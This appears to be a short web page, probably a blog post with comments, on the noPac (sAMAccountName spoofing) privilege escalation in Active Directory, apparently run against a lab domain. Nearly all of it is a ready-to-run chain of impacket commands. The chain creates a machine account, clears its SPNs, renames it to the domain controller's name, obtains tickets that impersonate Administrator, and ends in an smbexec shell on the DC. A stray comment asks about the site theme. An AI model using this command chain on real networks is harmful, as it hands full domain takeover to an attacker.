Active Directory Privilege Escalation | sAMAccountName spoofing | nopac attack

This getST.py edit allows to run S4U2Self only, with the -self flag, without having S4U2Proxy being engaged right after: github.com/fortra/impacket/blob/a67c44cb8216daac48088e5b94d378418ab75533/examples/getST.py

Hello, can you tell me the theme you are using?

Commands:
[*]>addcomputer.py -computer-name 'attack$' -computer-pass 'colombia1*' -dc-host DD-KVZLX -domain-netbios domain 'kvzlx.local/asreproast:2791@colombia'
[*]>addspn.py -u 'kvzlx\asreproast' -p 2791@colombia -t 'attack$' --clear dc-kvzlx
[*]>renameMachine.py -current-name "attack$" -new-name "DC-KVZLX" -dc-ip dc-kvzlx "kvzlx/asreproast:2791@colombia"`
[*]>getTGT.py -dc-ip dc-kvzlx "kvzlx.local/DC-KVZLX:colombia1*"
[*]>KRB5CCNAME=DC-KVZLX.ccache getST.py -self -impersonate 'Administrator' -altservice 'cifs/dc-kvzlx.kvzlx.local' -k -no-pass -dc-ip dc-kvzlx kvzlx.local/dc-kvzlx
[*]>KRB5CCNAME='dc.ccache' smbexec.py -target-ip 192.168.0.105 -dc-ip 192.168.0.105 -k -no-pass @'dc-kvzlx.kvzlx.local'